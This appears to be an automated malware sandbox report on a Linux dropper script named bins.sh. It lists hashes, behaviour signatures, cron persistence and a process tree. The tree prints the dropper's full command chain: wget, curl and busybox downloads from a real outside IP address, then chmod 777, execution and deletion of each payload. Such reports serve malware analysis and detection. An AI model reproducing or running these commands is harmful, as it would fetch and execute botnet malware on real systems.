Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    26/11/2024, 17:01

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    6ba8a8748f75571967562756ca21b71b

  • SHA1

    34882ed8e6e9809e322519be0ca0dbeb795757cd

  • SHA256

    5afdb5bbac7f5d3c2277c891e250c851aaf1bcb7b5ae535c0b5579caee3a545e

  • SHA512

    8a0e52f5a8a86784b50d71711349db2df0c00d16d9853a7a85a1b4a8511e710a50d5c250aa068b021ca81caafc7a2dff94f1ce4fc9a907f167e429b7185cb138

  • SSDEEP

    96:TlKrZDjN2CwWm8WaiqKtIaBEgCbjpEF18XPNWmslWaiqKt0fZDjN2CUnaRQgF1KE:5Kr4Wm8WaidtIasJXlWmaWaidtSMU

Malware Config

Signatures

  • Contacts a large (1758) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 6 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 6 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 18 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:1501
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:1502
        • /usr/bin/wget
          wget http://216.126.231.240/bins/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
          2⤵
          • Writes file to tmp directory
          PID:1503
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
          2⤵
          • Writes file to tmp directory
          PID:1507
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
          2⤵
          • Writes file to tmp directory
          PID:1516
        • /bin/chmod
          chmod 777 cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
          2⤵
          • File and Directory Permissions Modification
          PID:1517
        • /tmp/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
          ./cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
          2⤵
          • Executes dropped EXE
          PID:1518
        • /bin/rm
          rm cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
          2⤵
            PID:1520
          • /usr/bin/wget
            wget http://216.126.231.240/bins/G7l76kJ2JX6ltablJ94TRVornmZ5xy4VWS
            2⤵
            • Writes file to tmp directory
            PID:1521
          • /usr/bin/curl
            curl -O http://216.126.231.240/bins/G7l76kJ2JX6ltablJ94TRVornmZ5xy4VWS
            2⤵
            • Writes file to tmp directory
            PID:1522
          • /bin/busybox
            /bin/busybox wget http://216.126.231.240/bins/G7l76kJ2JX6ltablJ94TRVornmZ5xy4VWS
            2⤵
            • Writes file to tmp directory
            PID:1523
          • /bin/chmod
            chmod 777 G7l76kJ2JX6ltablJ94TRVornmZ5xy4VWS
            2⤵
            • File and Directory Permissions Modification
            PID:1524
          • /tmp/G7l76kJ2JX6ltablJ94TRVornmZ5xy4VWS
            ./G7l76kJ2JX6ltablJ94TRVornmZ5xy4VWS
            2⤵
            • Executes dropped EXE
            PID:1525
          • /bin/rm
            rm G7l76kJ2JX6ltablJ94TRVornmZ5xy4VWS
            2⤵
              PID:1527
            • /usr/bin/wget
              wget http://216.126.231.240/bins/j6hIBN3XleDG26GE1IIRXtO7d8W14IgPsu
              2⤵
              • Writes file to tmp directory
              PID:1528
            • /usr/bin/curl
              curl -O http://216.126.231.240/bins/j6hIBN3XleDG26GE1IIRXtO7d8W14IgPsu
              2⤵
              • Writes file to tmp directory
              PID:1529
            • /bin/busybox
              /bin/busybox wget http://216.126.231.240/bins/j6hIBN3XleDG26GE1IIRXtO7d8W14IgPsu
              2⤵
              • Writes file to tmp directory
              PID:1530
            • /bin/chmod
              chmod 777 j6hIBN3XleDG26GE1IIRXtO7d8W14IgPsu
              2⤵
              • File and Directory Permissions Modification
              PID:1531
            • /tmp/j6hIBN3XleDG26GE1IIRXtO7d8W14IgPsu
              ./j6hIBN3XleDG26GE1IIRXtO7d8W14IgPsu
              2⤵
              • Executes dropped EXE
              PID:1532
            • /bin/rm
              rm j6hIBN3XleDG26GE1IIRXtO7d8W14IgPsu
              2⤵
                PID:1534
              • /usr/bin/wget
                wget http://216.126.231.240/bins/vHqYKykCT4Lpp47xUis8P0RKj1KYcH8xYm
                2⤵
                • Writes file to tmp directory
                PID:1535
              • /usr/bin/curl
                curl -O http://216.126.231.240/bins/vHqYKykCT4Lpp47xUis8P0RKj1KYcH8xYm
                2⤵
                • Writes file to tmp directory
                PID:1536
              • /bin/busybox
                /bin/busybox wget http://216.126.231.240/bins/vHqYKykCT4Lpp47xUis8P0RKj1KYcH8xYm
                2⤵
                • Writes file to tmp directory
                PID:1537
              • /bin/chmod
                chmod 777 vHqYKykCT4Lpp47xUis8P0RKj1KYcH8xYm
                2⤵
                • File and Directory Permissions Modification
                PID:1538
              • /tmp/vHqYKykCT4Lpp47xUis8P0RKj1KYcH8xYm
                ./vHqYKykCT4Lpp47xUis8P0RKj1KYcH8xYm
                2⤵
                • Executes dropped EXE
                PID:1539
              • /bin/rm
                rm vHqYKykCT4Lpp47xUis8P0RKj1KYcH8xYm
                2⤵
                  PID:1541
                • /usr/bin/wget
                  wget http://216.126.231.240/bins/JLtdCnKvoZ3SGjOXdUzRLtljWHJ4euaHrD
                  2⤵
                  • Writes file to tmp directory
                  PID:1542
                • /usr/bin/curl
                  curl -O http://216.126.231.240/bins/JLtdCnKvoZ3SGjOXdUzRLtljWHJ4euaHrD
                  2⤵
                  • Writes file to tmp directory
                  PID:1543
                • /bin/busybox
                  /bin/busybox wget http://216.126.231.240/bins/JLtdCnKvoZ3SGjOXdUzRLtljWHJ4euaHrD
                  2⤵
                  • Writes file to tmp directory
                  PID:1544
                • /bin/chmod
                  chmod 777 JLtdCnKvoZ3SGjOXdUzRLtljWHJ4euaHrD
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1545
                • /tmp/JLtdCnKvoZ3SGjOXdUzRLtljWHJ4euaHrD
                  ./JLtdCnKvoZ3SGjOXdUzRLtljWHJ4euaHrD
                  2⤵
                  • Executes dropped EXE
                  PID:1546
                • /bin/rm
                  rm JLtdCnKvoZ3SGjOXdUzRLtljWHJ4euaHrD
                  2⤵
                    PID:1548
                  • /usr/bin/wget
                    wget http://216.126.231.240/bins/ZLB0la8M54LmFNTWP3dIrpW1ZrUoCZmvXg
                    2⤵
                    • Writes file to tmp directory
                    PID:1549
                  • /usr/bin/curl
                    curl -O http://216.126.231.240/bins/ZLB0la8M54LmFNTWP3dIrpW1ZrUoCZmvXg
                    2⤵
                    • Writes file to tmp directory
                    PID:1550
                  • /bin/busybox
                    /bin/busybox wget http://216.126.231.240/bins/ZLB0la8M54LmFNTWP3dIrpW1ZrUoCZmvXg
                    2⤵
                    • Writes file to tmp directory
                    PID:1551
                  • /bin/chmod
                    chmod 777 ZLB0la8M54LmFNTWP3dIrpW1ZrUoCZmvXg
                    2⤵
                    • File and Directory Permissions Modification
                    PID:1552
                  • /tmp/ZLB0la8M54LmFNTWP3dIrpW1ZrUoCZmvXg
                    ./ZLB0la8M54LmFNTWP3dIrpW1ZrUoCZmvXg
                    2⤵
                    • Executes dropped EXE
                    • Renames itself
                    • Reads runtime system information
                    PID:1553
                    • /bin/sh
                      sh -c "crontab -l"
                      3⤵
                        PID:1555
                        • /usr/bin/crontab
                          crontab -l
                          4⤵
                            PID:1556
                        • /bin/sh
                          sh -c "crontab -"
                          3⤵
                            PID:1557
                            • /usr/bin/crontab
                              crontab -
                              4⤵
                              • Creates/modifies Cron job
                              PID:1558
                        • /bin/rm
                          rm ZLB0la8M54LmFNTWP3dIrpW1ZrUoCZmvXg
                          2⤵
                            PID:1560
                          • /usr/bin/wget
                            wget http://216.126.231.240/bins/otlmwxI0RYxOusVKKlBfigqBxkMyQgWyAO
                            2⤵
                              PID:1563

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • /tmp/G7l76kJ2JX6ltablJ94TRVornmZ5xy4VWS

                            Filesize

                            119KB

                            MD5

                            1b166b95f9cb4b079ef1b9ec8363ddf3

                            SHA1

                            0d8eb08add467b3b5474f9b25909297fe7c2839c

                            SHA256

                            94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

                            SHA512

                            983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

                          • /tmp/JLtdCnKvoZ3SGjOXdUzRLtljWHJ4euaHrD

                            Filesize

                            117KB

                            MD5

                            849fa04ef88a8e8de32cb2e8538de5fe

                            SHA1

                            c768af29fe4b6695fff1541623e8bbd1c6f242f7

                            SHA256

                            8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579

                            SHA512

                            2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf

                          • /tmp/ZLB0la8M54LmFNTWP3dIrpW1ZrUoCZmvXg

                            Filesize

                            112KB

                            MD5

                            05d7857dcead18bbd86d2935f591873c

                            SHA1

                            34d18f41ef35f93d5364ce3e24d74730a4e91985

                            SHA256

                            2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

                            SHA512

                            d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

                          • /tmp/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY

                            Filesize

                            177KB

                            MD5

                            786d75a158fe731feca3880f436082c0

                            SHA1

                            79ea2734e43d00cdeabed5586b2c1994d02aef3e

                            SHA256

                            5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                            SHA512

                            7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                          • /tmp/j6hIBN3XleDG26GE1IIRXtO7d8W14IgPsu

                            Filesize

                            127KB

                            MD5

                            89077b7bd4bcafca7713be43635c4862

                            SHA1

                            fc02edb8fba29ea8ee99e6157ef8560334530052

                            SHA256

                            78416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d

                            SHA512

                            1b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1

                          • /tmp/vHqYKykCT4Lpp47xUis8P0RKj1KYcH8xYm

                            Filesize

                            151KB

                            MD5

                            3c90d5820bddcf7c5d1bd21dfa49d958

                            SHA1

                            5ba05bd489e50af97d6dc45e3a0be60e494d5083

                            SHA256

                            bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2

                            SHA512

                            54a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a

                          • /var/spool/cron/crontabs/tmp.5n60Ev

                            Filesize

                            210B

                            MD5

                            cf49566625bb5c03563924f401e94e76

                            SHA1

                            65584d4f64a35588a97556942201817e4ea7c752

                            SHA256

                            c1f786907e87df751eb1f899d2961cfb178a311e68545e7ed175e7bea6108f34

                            SHA512

                            5aaab7058f45574ddd21d517a9ef75c8c73a329bff1e311153a12cad511258347c962dac04f89611c6eb38578c23f77a8edfb96040d545c8219eaf737c1ad83d